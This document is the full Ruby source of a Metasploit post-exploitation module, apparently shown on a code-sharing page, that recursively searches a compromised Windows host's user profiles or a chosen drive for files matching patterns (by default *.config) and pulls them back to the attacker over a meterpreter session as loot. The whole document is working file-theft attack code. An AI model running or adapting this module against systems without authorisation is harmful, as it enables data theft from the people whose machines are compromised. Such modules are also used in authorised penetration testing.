Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::File
8
  include Msf::Post::Windows::FileSystem
9
  include Msf::Post::Windows::Version
10
  include Msf::Auxiliary::Report
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'Windows Gather Generic File Collection',
17
        'Description' => %q{
18
          This module downloads files recursively based on the FILE_GLOBS option.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [
22
          '3vi1john <Jbabio[at]me.com>',
23
          'RageLtMan <rageltman[at]sempervictus>'
24
        ],
25
        'Platform' => [ 'win' ],
26
        'SessionTypes' => [ 'meterpreter' ],
27
        'Compat' => {
28
          'Meterpreter' => {
29
            'Commands' => %w[
30
              stdapi_fs_search
31
              stdapi_railgun_api
32
              stdapi_sys_config_getenv
33
            ]
34
          }
35
        }
36
      )
37
    )
38

39
    register_options(
40
      [
41
        OptString.new('SEARCH_FROM', [ false, 'Search from a specific location. Ex. C:\\']),
42
        OptString.new('FILE_GLOBS', [ true, 'The file pattern to search for in a filename', '*.config'])
43
      ]
44
    )
45
  end
46

47
  def download_files(location, file_type)
48
    sysdriv = client.sys.config.getenv('SYSTEMDRIVE')
49
    profile_path_old = sysdriv + '\\Documents and Settings\\'
50
    profile_path_new = sysdriv + '\\Users\\'
51

52
    version = get_version_info
53
    if location
54
      print_status("Searching #{location}")
55
      getfile = client.fs.file.search(location, file_type, true, -1)
56

57
    elsif version.build_number < Msf::WindowsVersion::Vista_SP0
58
      print_status("Searching #{profile_path_old} through windows user profile structure")
59
      getfile = client.fs.file.search(profile_path_old, file_type, true, -1)
60
    else
61
      # For systems such as: Windows 7|Windows Vista|2008
62
      print_status("Searching #{profile_path_new} through windows user profile structure")
63
      getfile = client.fs.file.search(profile_path_new, file_type, true, -1)
64
    end
65

66
    getfile.each do |file|
67
      filename = "#{file['path']}\\#{file['name']}"
68
      data = read_file(filename)
69
      print_status("Downloading #{file['path']}\\#{file['name']}")
70
      p = store_loot('host.files', 'application/octet-stream', session, data, file['name'], filename)
71
      print_good("#{file['name']} saved as: #{p}")
72
    end
73
  end
74

75
  def run
76
    # When the location is set, make sure we have a valid path format
77
    location = datastore['SEARCH_FROM']
78
    if location && location !~ (%r{^([a-z]):[\\|/].*}i)
79
      print_error("Invalid SEARCH_FROM option: #{location}")
80
      return
81
    end
82

83
    # When the location option is set, make sure we have a valid drive letter
84
    my_drive = ::Regexp.last_match(1)
85
    drives = get_drives
86
    if location && !drives.include?(my_drive)
87
      print_error("#{my_drive} drive is not available, please try: #{drives.inspect}")
88
      return
89
    end
90

91
    datastore['FILE_GLOBS'].split(',').each do |glob|
92
      download_files(location, glob.strip)
93
    rescue ::Rex::Post::Meterpreter::RequestError => e
94
      if e.message =~ /The device is not ready/
95
        print_error("#{my_drive} drive is not ready")
96
        next
97
      elsif e.message =~ /The system cannot find the path specified/
98
        print_error('Path does not exist')
99
        next
100
      else
101
        raise e
102
      end
103
    end
104

105
    print_status('Done!')
106
  end
107
end
108

109